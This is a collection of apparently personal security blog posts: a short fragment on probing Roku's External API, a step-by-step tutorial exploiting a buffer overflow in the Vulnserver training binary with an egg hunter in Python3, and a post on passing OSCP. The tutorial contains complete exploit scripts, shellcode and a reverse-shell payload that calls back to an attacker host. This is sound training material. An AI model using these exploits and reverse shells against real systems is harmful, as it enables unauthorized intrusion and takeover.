Within the Roku Developer documentation, though, it does talk about the way brightscript applications are sandboxed and have limited access to system functions. The brightscript might be a dead end but it’s worth a shot, so I will build a few basic apps and see what information I can get from the system or the effective application hypervisor.

Another interesting part of the Roku External API is the capability to send remote commands to the system via simple HTTP requests. By remote commands I mean the literal Roku Remote (Home, Netflix, Back, Up, etc.). This is interesting because it means that it may be possible to enable developer mode and manipulate settings without physical access to the system. So, if there was a possible exploit vector via a Brightscript application, that path to exploitation could hypothetically be automated.


Vulnserver KSTET Egg Hunter with Python3

Sevro Security

Joshua

22 November 2018 at 04:37


During my OSCP study, I went down the Buffer Overflow rabbit hole and found myself going a bit further than needed. I found out I really freaking like binary exploitation! Today, I am going to talk about Egg Hunters. Egg Hunters are used when we don’t have enough room after the EIP overwrite to execute anything worth our time (i.e., a shell, system command, etc.). An Egg Hunter is a small set of bytecode that is effectively a loop looking for a pre-defined string (that we define) in memory and when it finds that string, it will execute whatever is after. The code after our pre-defined string being our exploitation bytecode.

To put this into context, let’s say we have two FTP parameters that store data on the stack (USER, PASS). Let’s say that the PASS parameter is susceptible to a BOF attack and we can easily gain control of EIP. However, we only have maybe 20-30 bytes after the EIP overwrite to store any bytecode and that’s just not enough space to do anything useful. In comes the USER parameter. It’s not susceptible to a Buffer Overflow necessarily however, it might give us enough buffer space to store our shellcode. In this case, we would have a two-stage execution where we conduct the following:

Connect to the FTP server.
Send our Reverse Shell Payload in the USER parameter.
Send our Egghunter plus the EIP Overwrite to JMP ESP in the PASS Parameter.
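Before touching the debugger, it can help to see the egg hunter idea in plain Python. The sketch below only models the search: a real egg hunter is a few bytes of assembly that walks process memory page by page and skips unreadable pages, none of which is simulated here. The tag `loki` is the one used later in this post, and the "memory" is just a bytes object.

```python
def hunt_egg(memory: bytes, tag: bytes) -> int:
    """Return the offset of the first byte after the doubled tag, or -1."""
    # The tag is written twice in front of the payload so the hunter does not
    # stop on the single copy of the tag embedded in its own code.
    egg = tag * 2
    position = memory.find(egg)
    if position == -1:
        return -1
    return position + len(egg)


if __name__ == "__main__":
    # A lone "loki" (like the copy inside the hunter) followed by the real egg.
    memory = b"\x00" * 64 + b"loki" + b"\x90" * 16 + b"lokiloki" + b"PAYLOAD"
    start = hunt_egg(memory, b"loki")
    print(start, memory[start:])
```

Execution would continue at the returned offset, which is where the Stage 1 payload begins.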

Okay, let’s dig in.

[hr]

Setup:

Here is the setup that is being used during the entire write-up:

[Attacker] Kali 2018.4 x86_64
[Victim] Windows XP SP3 Build 2600
[Vulnerable Binary] VulnServer
[Language] Python 3.6.6
[Debugger] Immunity
- We will also use the Mona Script with Immunity.

Some of you might be asking why Python 3? That’s fair since the python 3 socket library is different than the 2.7 library and that’s really why I am using it, to learn. The biggest difference you will note is that when you send your data to the server, it has to be in a byte object and not a string object whereas 2.7 doesn’t give a shit.

[hr]

Fuzzing:

Our first goal is to identify which parameters are vulnerable but since VulnServer has a few, we’re going to start with the KSTET Parameter. In order to get a better idea on how many parameters there are, below is the available listing.

VulnServer Parameters

We send 1,000 A’s (\x41) with the KSTET parameter and we see we overflow the buffer.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*1000

s.send(b"KSTET %s \r\n" % buf)

s.close()

[hr]

Controlling EIP:

Just like we do with any BOF, let’s get the offset of EIP so we can start the process of controlling EIP.

pattern_create.rb -l 1000

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
pattern = (b'''Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B''')

buf = b""
buf += pattern

s.send(b"KSTET %s \r\n" % buf)

s.close()

We then verify the Immunity EIP value.

EIP Offset

And use pattern_offset to find the true offset of EIP:

pattern_offset.rb -q 63413363
- Offset = 70
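If the Metasploit scripts are not at hand, the same lookup can be sketched in a few lines of Python. This is a stand-in written for this example, not the Metasploit implementation: it assumes the pattern is the upper/lower/digit triple sequence visible in the script here and that EIP holds the four pattern bytes in little-endian order.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build an Aa0Aa1Aa2...-style cyclic pattern of `length` bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip: int, length: int = 1000) -> int:
    """Offset of the 4 bytes found in EIP within the pattern, or -1."""
    needle = struct.pack("<I", eip)  # register value back to its in-memory byte order
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_offset(0x63413363))
```

For the EIP value seen in Immunity, the four bytes are `c3Ac`, which first appear 70 bytes into the pattern.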

Now, let’s send a new payload to do two different things. The first goal is to verify we do have control of EIP by writing all B’s into EIP and the next goal is to check how much space we have after the EIP overwrite to place our shellcode. We do this by sending 600 C’s. The new code looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*EIP_OFFSET
buf += b"B"*4
buf += b"C"*600

s.send(b"KSTET %s \r\n" % buf)

s.close()

Immunity shows that yes, we have control of EIP as there are now 4 B’s (\x42) residing in the EIP register, however, we only have 28 Bytes of space after the EIP overwrite. As stated in the beginning of this tutorial, that’s just not enough, we need more space.

EIP Verify

Overflow Space

[hr]

Determine Bad Characters:

Before we start digging into other parameters we can place our shellcode into, let’s determine the bad characters. Here is our new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Bad Characters:
bad_chars = [0x00,0x0a]
chars = b""
for i in range(0x00,0xFF+1):
    if i not in bad_chars:
        chars += bytes([i])
with open("bad_chars.bin", "wb") as f:
    f.write(chars)

# Send data to the KSTET Parameter:
buf = b""
buf += chars
s.send(b"KSTET %s \r\n" % buf)

s.close()

In looking at the bad characters, it’s apparent that we don’t have enough space to review the whole array of bytes. As such, I conducted the overflow in three separate operations:

Operation 1: 0x00 – 0x60
Operation 2: 0x60 – 0xC0
Operation 3: 0xC0 – 0xFF

Bad Characters were determined to be: 0x00, 0x0A, 0x0D
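Splitting the byte range into the three operations can be scripted rather than edited by hand each run. The sketch below assumes a chunk size of 0x60, taken from the ranges listed above and treated as half-open (0x00-0x5F, 0x60-0xBF, 0xC0-0xFF); the function name is made up for this example.

```python
def byte_chunks(bad_chars, chunk_size=0x60):
    """Split 0x00-0xFF, minus `bad_chars`, into runs of at most `chunk_size` values."""
    chunks = []
    for start in range(0x00, 0x100, chunk_size):
        stop = min(start + chunk_size, 0x100)
        chunks.append(bytes(b for b in range(start, stop) if b not in bad_chars))
    return chunks


if __name__ == "__main__":
    for number, chunk in enumerate(byte_chunks({0x00, 0x0A, 0x0D}), start=1):
        print(f"Operation {number}: {len(chunk)} bytes, "
              f"0x{chunk[0]:02X} - 0x{chunk[-1]:02X}")
```

Each chunk can then be sent in its own run in place of the full `chars` buffer.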

[hr]

Finding JMP ESP:

Since I am using Windows XP SP3 as the victim, there will be little to no protection (DEP, ASLR). That means we can just ask mona to look for the JMP ESP opcode (\xFF\xE4) and choose any of the results.

JMP ESP

I’m just going to use the first result (0x7C874F13). To make sure we have full control and are able to execute the JMP ESP instruction, let’s restart the vulnserver in Immunity and set a break point at the address. Here is the new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("<I", 0x7C874F13)         # FFE4  JMP ESP (little-endian)
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A" * EIP_OFFSET
buf += JMP_ESP
s.send(b"KSTET %s \r\n" % buf)

s.close()

And we have a successful JMP ESP.

Breakpoint Hit
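The reason the address is written "backwards" in the commented-out line is byte order: x86 stores the least significant byte first. A short sketch of the packing, plus a check that the chosen address contains none of the bad characters found earlier, is below. The helper `has_bad_chars` is made up for this example.

```python
import struct

JMP_ESP_ADDRESS = 0x7C874F13      # address picked from the mona results
BAD_CHARS = {0x00, 0x0A, 0x0D}    # bad characters determined earlier


def has_bad_chars(data: bytes, bad_chars=BAD_CHARS) -> bool:
    """True if any byte of `data` is a known bad character."""
    return any(byte in bad_chars for byte in data)


# "<" forces little-endian regardless of the host, "I" is a 4-byte unsigned int.
packed = struct.pack("<I", JMP_ESP_ADDRESS)

if __name__ == "__main__":
    print(packed.hex(), has_bad_chars(packed))
```

Using an explicit `<` keeps the result the same on any machine the script runs from.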

[hr]

Building the Egghunter:

Okay, we know that we only have about 28 Bytes after the EIP overwrite to work with. That won’t fit our egghunter byte code. In that case, we will inject our egghunter before the EIP overwrite and then add the instruction JMP SHORT -48 after the EIP overwrite to jump back to our egghunter. What we need to figure out now is which parameter can successfully take an input of about 350-450 bytes of data and not throw an exception or overflow the buffer. Let’s build a fuzzing script to do that for us.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("<I", 0x7C874F13)         # FFE4  JMP ESP (little-endian)
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"GTER",b"HTER",b"LTER",b"KSTAN"]

for i in range(0,len(parameters)):
    print("[+] Sending %s"% str(parameters[i]))
    buf = b""
    buf += parameters[i]
    buf += b" "
    buf += b"A" * 500
    s.send(b"%s\r\n" % buf)
    time.sleep(1)

Right away, we find that the GTER parameter causes an overflow. Let’s remove that and test again. After the second test, we see that the rest of the parameters ran successfully without causing an overflow or an exception. This means that maybe, we can store our shellcode in one of these parameters and have the egghunter find it in memory. Now that we know the parameters, let’s add this to our script and build a two payload program.

To generate the egghunter code, we will use mona.

!mona egg -cpb "\x00\x0a\x0d" -t loki

Generate Egghunter

The image above shows our egghunter shellcode. The generated shellcode will also be listed in an egghunter.txt document located at C:/Program Files/Immunity Inc/Immunity Debugger.

Now let’s generate some shellcode. For testing, I am just going to send the command calc.exe. The syntax to generate this shellcode is:

msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d' -f c

Our new script looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("<I", 0x7C874F13)         # FFE4  JMP ESP (little-endian)
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

# Every line needs the b prefix: Python 3 refuses to concatenate bytes and str literals.
shellcode = (b"\xda\xce\xba\x5b\x24\x91\xbf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
b"\x31\x83\xef\xfc\x31\x57\x14\x03\x57\x4f\xc6\x64\x43\x87\x84"
b"\x87\xbc\x57\xe9\x0e\x59\x66\x29\x74\x29\xd8\x99\xfe\x7f\xd4"
b"\x52\x52\x94\x6f\x16\x7b\x9b\xd8\x9d\x5d\x92\xd9\x8e\x9e\xb5"
b"\x59\xcd\xf2\x15\x60\x1e\x07\x57\xa5\x43\xea\x05\x7e\x0f\x59"
b"\xba\x0b\x45\x62\x31\x47\x4b\xe2\xa6\x1f\x6a\xc3\x78\x14\x35"
b"\xc3\x7b\xf9\x4d\x4a\x64\x1e\x6b\x04\x1f\xd4\x07\x97\xc9\x25"
b"\xe7\x34\x34\x8a\x1a\x44\x70\x2c\xc5\x33\x88\x4f\x78\x44\x4f"
b"\x32\xa6\xc1\x54\x94\x2d\x71\xb1\x25\xe1\xe4\x32\x29\x4e\x62"
b"\x1c\x2d\x51\xa7\x16\x49\xda\x46\xf9\xd8\x98\x6c\xdd\x81\x7b"
b"\x0c\x44\x6f\x2d\x31\x96\xd0\x92\x97\xdc\xfc\xc7\xa5\xbe\x6a"
b"\x19\x3b\xc5\xd8\x19\x43\xc6\x4c\x72\x72\x4d\x03\x05\x8b\x84"
b"\x60\xf9\xc1\x85\xc0\x92\x8f\x5f\x51\xff\x2f\x8a\x95\x06\xac"
b"\x3f\x65\xfd\xac\x35\x60\xb9\x6a\xa5\x18\xd2\x1e\xc9\x8f\xd3"
b"\x0a\xaa\x4e\x40\xd6\x03\xf5\xe0\x7d\x5c")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # JMP SHORT $-48 (rel8 = -50): back into the NOP sled before the egghunter
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

The script is broken down into two stages. Each stage opens a new socket connection to the vulnerable server, and this is important. Also, take note of the Stage 1 s.send() call: I have added b"lokiloki" to it. This is the string that the egghunter is going to look for in memory. When you generate the egghunter with mona and read the .txt file it generates, it will explicitly tell you what text to put there. Let’s break down what is happening at each stage.

Stage 1:

In stage one, we connect to the vulnerable server and start a for loop. The for loop loops through the parameters array using each value to send the shellcode payload. We don’t know which parameter will truly hold our shellcode so hell, why not try them all! And that’s effectively what we are doing here. It’s also important to note that a 1-second time delay is necessary at the end of each loop iteration. Without that one second time delay, we outpace the server and never give it a chance to take action on the command we just sent.
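As a minimal sketch of what each Stage 1 line looks like on the wire, the snippet below builds one payload per command. The helper name build_stage1 and the placeholder shellcode are assumptions for illustration. The egghunter bytes are the ones from the script above, and the check confirms that the 4-byte tag inside them is "loki", which is why the marker in front of the shellcode is that tag twice.

```python
# Egghunter bytes copied from the script above (generated by mona with -t loki).
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

TAG = b"loki"   # 4-byte tag passed to mona via -t
EGG = TAG * 2   # marker placed in front of the shellcode


def build_stage1(command: bytes, shellcode: bytes) -> bytes:
    """Return one Stage 1 line: b'<COMMAND> <egg><shellcode>\\r\\n' (hypothetical helper)."""
    return command + b" " + EGG + shellcode + b"\r\n"


# 0xB8 is MOV EAX, imm32; the four bytes after it are the tag the hunter compares against.
tag_offset = EGGHUNTER.index(b"\xb8") + 1
assert EGGHUNTER[tag_offset:tag_offset + 4] == TAG

placeholder = b"\xcc" * 8   # stand-in for the real msfvenom shellcode
for command in (b"STATS", b"RTIME", b"LTIME"):
    print(build_stage1(command, placeholder))
```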

Stage 2:

Stage two is where the real magic happens. We create a new socket and connect to the vulnerable server once again. This time, we send the egghunter between two sets of NOPs, overwrite the EIP register with the memory address of our JMP ESP instruction, and then add a custom instruction we wrote (\xEB\xCE) that is loaded onto the stack by our overflow and executed after the JMP ESP instruction. Let’s take a look at this instruction and why we have it in our payload.

Our egghunter shellcode is still a bit too big to be loaded after the JMP ESP. However, we know we have a total of 70 bytes before the EIP overwrite, and therefore we can use that space to store our egghunter and then jump back to it with a custom instruction. In this case, I want to jump back 48 bytes, which lands inside our first NOP sled. We can use nasm_shell.rb to give us the correct opcode, as seen in the image below.

NASM

Let’s put a breakpoint in Immunity at our JMP ESP and step through what is going on here.

JMP SHORT -48

When we hit our breakpoint, we step forward one instruction (F7) to get to our JMP SHORT instruction, highlighted in blue in the leftmost image. When we step forward one more instruction, we jump to a lower memory address that puts us 4 NOP bytes before our egghunter. Perfect!
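The arithmetic behind that landing spot can be checked with a short sketch. It assumes, as the Stage 2 buffer implies, that ESP points at the bytes immediately after the overwritten return address when JMP ESP runs. The helper short_jmp is a hypothetical name, and the offsets are measured from the first byte after "KSTET ".

```python
import struct

EIP_OFFSET = 70      # bytes before the saved return address (from the script)
EGGHUNTER_LEN = 32   # length of the mona egghunter used above
LEAD_NOPS = 30       # size of the first NOP sled


def short_jmp(distance_from_jmp: int) -> bytes:
    """Encode JMP SHORT to (address of the jmp + distance_from_jmp).

    The CPU adds the 8-bit displacement to the address of the *next*
    instruction, so the 2-byte length of the jmp itself is subtracted.
    """
    rel8 = distance_from_jmp - 2
    if not -128 <= rel8 <= 127:
        raise ValueError("target out of range for a short jump")
    return b"\xeb" + struct.pack("b", rel8)


egghunter_start = LEAD_NOPS                              # offset 30
trailing_nops = EIP_OFFSET - EGGHUNTER_LEN - LEAD_NOPS   # 8 bytes of padding
jmp_offset = EIP_OFFSET + 4                              # first bytes after the return address
landing = jmp_offset - 48                                # where the short jump lands

print(short_jmp(-48).hex())          # opcode bytes for the jump
print(egghunter_start - landing)     # NOPs executed before the egghunter
```

This is also why the opcode ends in 0xCE (-50) even though the jump lands 48 bytes before the jump instruction: the extra two bytes account for the length of the jump itself.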

The egghunter is going to start a loop looking for the lokiloki string in memory in an attempt to find our shellcode and execute it. If we let the rest of the code run its course, we get calc.exe to pop and we know we have full code execution!

calc.exe
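As a rough picture of what the egghunter’s search amounts to, here is a high-level simulation in Python. It is only a sketch: the real egghunter is assembly that walks process memory, while this version scans a hypothetical bytes buffer. The function name find_shellcode and the fake memory contents are assumptions. It also shows why the tag is doubled: a single copy of "loki" (such as the one embedded in the hunter itself) does not match.

```python
from typing import Optional

EGG = b"loki" * 2   # tag repeated twice, as in the Stage 1 payload


def find_shellcode(memory: bytes, egg: bytes = EGG) -> Optional[int]:
    """Return the offset of the first byte after the egg, or None if absent."""
    position = memory.find(egg)
    if position == -1:
        return None
    return position + len(egg)


# Hypothetical memory snapshot: a lone tag, some NOPs, then the egg and "shellcode".
memory = b"\x00" * 16 + b"loki" + b"\x90" * 8 + EGG + b"\xcc\xcc\xcc\xcc"
start = find_shellcode(memory)
print(start, memory[start:])
```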


Reverse Shell:

Now that we have a fully working exploit, let’s replace the calc.exe shellcode with a reverse shell and see what happens.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.136 LPORT=443 -b '\x00\x0a\x0d' -f c

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("<I", 0x7C874F13)         # FFE4  JMP ESP (little-endian)
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

shellcode = (b"\xda\xc7\xd9\x74\x24\xf4\xb8\xca\x84\x12\x1c\x5a\x33\xc9\xb1"
b"\x52\x31\x42\x17\x83\xc2\x04\x03\x88\x97\xf0\xe9\xf0\x70\x76"
b"\x11\x08\x81\x17\x9b\xed\xb0\x17\xff\x66\xe2\xa7\x8b\x2a\x0f"
b"\x43\xd9\xde\x84\x21\xf6\xd1\x2d\x8f\x20\xdc\xae\xbc\x11\x7f"
b"\x2d\xbf\x45\x5f\x0c\x70\x98\x9e\x49\x6d\x51\xf2\x02\xf9\xc4"
b"\xe2\x27\xb7\xd4\x89\x74\x59\x5d\x6e\xcc\x58\x4c\x21\x46\x03"
b"\x4e\xc0\x8b\x3f\xc7\xda\xc8\x7a\x91\x51\x3a\xf0\x20\xb3\x72"
b"\xf9\x8f\xfa\xba\x08\xd1\x3b\x7c\xf3\xa4\x35\x7e\x8e\xbe\x82"
b"\xfc\x54\x4a\x10\xa6\x1f\xec\xfc\x56\xf3\x6b\x77\x54\xb8\xf8"
b"\xdf\x79\x3f\x2c\x54\x85\xb4\xd3\xba\x0f\x8e\xf7\x1e\x4b\x54"
b"\x99\x07\x31\x3b\xa6\x57\x9a\xe4\x02\x1c\x37\xf0\x3e\x7f\x50"
b"\x35\x73\x7f\xa0\x51\x04\x0c\x92\xfe\xbe\x9a\x9e\x77\x19\x5d"
b"\xe0\xad\xdd\xf1\x1f\x4e\x1e\xd8\xdb\x1a\x4e\x72\xcd\x22\x05"
b"\x82\xf2\xf6\x8a\xd2\x5c\xa9\x6a\x82\x1c\x19\x03\xc8\x92\x46"
b"\x33\xf3\x78\xef\xde\x0e\xeb\xd0\xb7\x28\x63\xb8\xc5\x48\x72"
b"\x82\x43\xae\x1e\xe4\x05\x79\xb7\x9d\x0f\xf1\x26\x61\x9a\x7c"
b"\x68\xe9\x29\x81\x27\x1a\x47\x91\xd0\xea\x12\xcb\x77\xf4\x88"
b"\x63\x1b\x67\x57\x73\x52\x94\xc0\x24\x33\x6a\x19\xa0\xa9\xd5"
b"\xb3\xd6\x33\x83\xfc\x52\xe8\x70\x02\x5b\x7d\xcc\x20\x4b\xbb"
b"\xcd\x6c\x3f\x13\x98\x3a\xe9\xd5\x72\x8d\x43\x8c\x29\x47\x03"
b"\x49\x02\x58\x55\x56\x4f\x2e\xb9\xe7\x26\x77\xc6\xc8\xae\x7f"
b"\xbf\x34\x4f\x7f\x6a\xfd\x7f\xca\x36\x54\xe8\x93\xa3\xe4\x75"
b"\x24\x1e\x2a\x80\xa7\xaa\xd3\x77\xb7\xdf\xd6\x3c\x7f\x0c\xab"
b"\x2d\xea\x32\x18\x4d\x3f")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # JMP SHORT $-48 (rel8 = -50): back into the NOP sled before the egghunter
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

And, we’re Admin!

Admin Shell


Thoughts on Python3:

I decided to use Python3 for this tutorial because I use it for just about everything. That is, with the exception of exploit development. Python 2.7 is my go-to for buffer overflow development and honestly, I think I am going to keep it that way. The subtle but annoying nuances of making sure everything was typecast to a bytes object sucked. Many times the objects would be sent oddly and not trigger the response I was looking for. Python 2.7 allows strings in the s.send() method, which makes things much easier to deal with.
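One likely source of payloads being "sent oddly" in Python3 is encoding a str instead of starting from bytes. The sketch below is an illustration of that pitfall under that assumption, not a diagnosis of any specific failure: the same escape sequences end up with different lengths depending on how they reach a bytes object.

```python
import struct

# Bytes literals keep every value from 0x00 to 0xff as a single byte.
raw = b"\xda\xce\xff"

# A str with the same escapes holds code points, not bytes. The default
# UTF-8 encoding turns every code point above 0x7f into two bytes.
text = "\xda\xce\xff"
utf8 = text.encode()              # what you get if you "just encode" a str
latin1 = text.encode("latin-1")   # one byte per code point, matches raw

# Pack addresses with an explicit little-endian format instead of typing the bytes by hand.
jmp_esp = struct.pack("<I", 0x7C874F13)

print(len(raw), len(utf8), len(latin1))
print(latin1 == raw, jmp_esp == b"\x13\x4f\x87\x7c")
```

Keeping every piece of the payload as a bytes literal from the start avoids the problem entirely.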

Anyhow, Python3 is still amazing and I will use it as my daily driver, with the exception of BOF exploit development!

Happy Thanksgiving!

Vulnserver KSTET Egg Hunter with Python3
Joshua

OSCP: Passing

Sevro Security

Joshua

28 October 2018 at 01:28


I’m humbled to finally be able to say that I am an OSCP! I was able to get 80/100 points on my second exam attempt last Friday and received the pass email on the following Monday.

I wanted to take some time and post about my experience and the way I personally managed the exam itself. There are already a significant number of blog posts from extremely talented individuals talking about their methods and their success, and although I will touch on that, I really wanted to focus on exam management. Essentially, how I set up my pre-exam workspace in order to make my flow and reporting easier. This was critical to passing the second time around. Having a single one-stop place to view the systems, their enumeration, and their exploits was incredibly helpful in pivoting and exam reporting.


OSCP PWK Course and Exam Review:

Incredible. Purely incredible! Over the last year and a half, I have been teaching myself this skillset, but there’s a point you reach where a more formal approach to building it is needed. Well, at least I needed that. OSCP gave me that and then some. Long story short, if you are looking for something extremely challenging that is practical, no bullshit, and a straight-up chance to prove yourself, then this is the path you want to go down. Let’s talk a bit more about the exam process during my second attempt:


Before the Exam:

My first exam attempt was at 10:00 and I burned myself out too fast. For my second attempt, I started the exam at 16:00. This was way better than an early morning start, for me at least. A few hours before my second exam, I set up everything ahead of time, and I suggest everyone do the same.

Start your Kali box and verify network connectivity and disk space on the VM.
Create a full snapshot of the VM a few hours before the exam.
Create the directory you will be working from for the whole exam:
- /opt/OSCP/EXAM_2 –> this was mine
Start necessary services you may need and verify logins/auth works:
- FTP, TFTP, SSH, etc.
Open Firefox, Burpsuite, Terminal w/ TMUX, and Sparta.
Open up CherryTree and generate your Box Flow, I did it on a per-node basis like so:
- (25) <IP_ADDR>
- (25) <IP_ADDR>
- (20) <IP_ADDR>
- (20) <IP_ADDR>
- (10) <IP_ADDR>
In Terminal, have a TMUX window for NMAP Scans and generate your NMAP syntax in different frames on the same window.
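The directory and per-host steps above could be scripted ahead of time. The following is only a sketch under assumptions: the function name create_workspace, the subfolder names (nmap, screenshots, exploits), and the notes.txt file are all hypothetical choices, not part of my actual setup, and the demo runs in a temporary directory rather than /opt/OSCP/EXAM_2.

```python
import tempfile
from pathlib import Path
from typing import List, Tuple


def create_workspace(root: Path, hosts: List[Tuple[int, str]]) -> List[Path]:
    """Create one folder per host, named '<points>_<address>' (hypothetical layout)."""
    created = []
    for points, address in hosts:
        host_dir = root / f"{points}_{address}"
        for sub in ("nmap", "screenshots", "exploits"):   # assumed subfolders
            (host_dir / sub).mkdir(parents=True, exist_ok=True)
        (host_dir / "notes.txt").touch()                  # per-host scratch notes
        created.append(host_dir)
    return created


# Placeholder addresses stand in for the real exam hosts.
exam_hosts = [(25, "IP_ADDR_1"), (25, "IP_ADDR_2"), (20, "IP_ADDR_3"),
              (20, "IP_ADDR_4"), (10, "IP_ADDR_5")]

with tempfile.TemporaryDirectory() as tmp:
    for path in create_workspace(Path(tmp), exam_hosts):
        print(path.name)
```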

